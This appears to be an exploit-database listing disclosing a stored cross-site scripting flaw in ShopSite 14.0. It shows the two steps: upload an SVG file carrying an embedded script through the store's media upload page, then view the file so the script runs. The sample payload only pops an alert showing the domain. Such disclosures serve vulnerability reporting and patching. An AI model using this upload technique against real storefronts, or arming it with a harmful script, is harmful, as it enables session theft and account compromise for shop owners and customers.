Share
## https://sploitus.com/exploit?id=PACKETSTORM:176312
# Exploit Title: ShopSite Version: 14.0 - Stored XSS  
# Date: 2023-12-25  
# Exploit Author: tmrswrr  
# Category : Webapps  
# Vendor Homepage: https://www.shopsite.com/  
# Version: 14.0  
# Tested on: https://www.shopsite.com/demo.html  
  
  
  
1 ) Upload poc.svg file here : https://demo.shopsite.com/cgi-bin/ssdemos/stores/alsdemo/ss/mediam.cgi  
  
poc.svg  
  
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 500 500">  
<script>//<![CDATA[  
alert(document.domain)  
//]]>  
</script>  
</svg>  
  
  
2 ) Check here will be see alert button : https://a-demo-store.com/ssdemos/stores/alsdemo3/media/ss_sunglasses/aaa.svg